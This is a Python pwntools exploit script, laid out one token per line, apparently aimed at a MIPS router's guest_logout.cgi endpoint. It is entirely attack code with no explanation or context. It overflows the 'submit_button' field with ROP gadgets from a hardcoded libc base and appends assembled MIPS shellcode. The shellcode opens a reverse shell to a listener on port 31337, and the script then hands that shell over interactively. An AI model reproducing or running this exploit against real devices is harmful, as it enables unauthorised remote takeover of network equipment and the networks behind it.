from
pwn
import
*
import
thread,requests
context(arch
=
'mips'
,endian
=
'little'
,os
=
'linux'
, log_level
=
'debug'
)
io
=
listen(
31337
)
libc
=
0x77a6a000
jmp_a0
=
libc
+
0x0003D050
jmp_s0
=
libc
+
0x000257A0
shellcode
=
"slti $a0, $zero, 0xFFFF\n"
shellcode
+
=
"slti $a0, $zero, 0xFFFF\n"
shellcode
+
=
"li $v0, 4006\n"
shellcode
+
=
"syscall 0x42424\n"
shellcode
+
=
"slti $a0, $zero, 0x1111\n"
shellcode
+
=
"li $v0, 4006\n"
shellcode
+
=
"syscall 0x42424\n"
shellcode
+
=
"li $t4, 0xFFFFFFFD\n"
shellcode
+
=
"not $a0, $t4\n"
shellcode
+
=
"li $v0, 4006\n"
shellcode
+
=
"syscall 0x42424\n"
shellcode
+
=
"li $t4, 0xFFFFFFFD\n"
shellcode
+
=
"not $a0, $t4\n"
shellcode
+
=
"not $a1, $t4\n"
shellcode
+
=
"slti $a2, $zero, 0xFFFF\n"
shellcode
+
=
"li $v0, 4183\n"
shellcode
+
=
"syscall 0x42424\n"
shellcode
+
=
"andi $a0, $v0, 0xFFFF\n"
shellcode
+
=
"li $v0, 4041\n"
shellcode
+
=
"syscall 0x42424\n"
shellcode
+
=
"li $v0, 4041\n"
shellcode
+
=
"syscall 0x42424\n"
shellcode
+
=
"lui $a1, 0x6979\n"
shellcode
+
=
"ori $a1, 0xFF01\n"
shellcode
+
=
"addi $a1, $a1, 0x0101\n"
shellcode
+
=
"sw $a1, -8($sp)\n"
shellcode
+
=
"li $a1, 0x010A0A0A\n"
shellcode
+
=
"sw $a1, -4($sp)\n"
shellcode
+
=
"addi $a1, $sp, -8\n"
shellcode
+
=
"li $t4, 0xFFFFFFEF\n"
shellcode
+
=
"not $a2, $t4\n"
shellcode
+
=
"li $v0, 4170\n"
shellcode
+
=
"syscall 0x42424\n"
shellcode
+
=
"lui $t0, 0x6962\n"
shellcode
+
=
"ori $t0, $t0,0x2f2f\n"
shellcode
+
=
"sw $t0, -20($sp)\n"
shellcode
+
=
"lui $t0, 0x6873\n"
shellcode
+
=
"ori $t0, 0x2f6e\n"
shellcode
+
=
"sw $t0, -16($sp)\n"
shellcode
+
=
"slti $a3, $zero, 0xFFFF\n"
shellcode
+
=
"sw $a3, -12($sp)\n"
shellcode
+
=
"sw $a3, -4($sp)\n"
shellcode
+
=
"addi $a0, $sp, -20\n"
shellcode
+
=
"addi $t0, $sp, -20\n"
shellcode
+
=
"sw $t0, -8($sp)\n"
shellcode
+
=
"addi $a1, $sp, -8\n"
shellcode
+
=
"addiu $sp, $sp, -20\n"
shellcode
+
=
"slti $a2, $zero, 0xFFFF\n"
shellcode
+
=
"li $v0, 4011\n"
shellcode
+
=
"syscall 0x42424"
shell
=
asm(shellcode)
payload
=
"status_guestnet.asp"
+
'a'
*
49
+
p32(jmp_a0)
+
0x20
*
'a'
+
p32(jmp_s0)
+
0x18
*
'a'
+
shell
paramsPost
=
{
"cmac"
:
"7a:29:9f:d3:d2:6e"
,
"submit_button"
:payload,
"cip"
:
"192.168.1.1"
,
}
def
attack():
try
:
requests.post(
"http://10.10.10.3/guest_logout.cgi"
, data
=
paramsPost, verify
=
False
)
except
:
pass
thread.start_new_thread(attack,())
io.wait_for_connection()
log.success(
"getshell"
)
io.interactive()